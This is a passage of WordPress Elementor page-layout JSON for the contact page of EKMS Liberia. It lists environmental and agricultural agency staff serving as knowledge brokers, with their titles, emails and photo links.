Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be9d288\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/konikay.png\",\"id\":3601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/bgoll.png\",\"id\":3596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konikay Nimely BSc, MSc.<\\/strong><br \\/>EIA Manager<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll BSc, MSc.<\\/strong><br \\/>Technical Manager Conservation Department<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b40c80d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8bb2d6d\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7932328\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3f8a3ea\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/03\\/duolupeh.png\",\"id\":3602}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b158b68\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1894b7f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a79d62d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7d0d9ed\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f289365\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"1d3b712\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2a21d0a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joseph G. Duolupeh BSc, MPSM.<\\/strong><br \\/>Manager, Strategic Planning Unit<br \\/>FDA<br \\/><a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6290cd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0a0118f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea6ac52\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d34617b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83b2935\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7332871\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"820e282\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cc8ab59\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Kullie<\\/strong><br \\/>Director of LHS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"571bd4b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ernest M. Menseah <\\/strong><br \\/>Director of LGS<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"976bac9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Wonpue Quellian <\\/strong><br \\/>Research Officer<br \\/>MME<br \\/><a href=\\\"mailto:wonpuequellian2017@gmail.com\\\">wonpuequellian2017@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c167ff3\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f869f0a\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"309e701\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ad4abd4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c6f852\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4463645\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"7731dcd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"41cb42e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4b566af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"201ee41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"78f07ce\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"464f4ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a 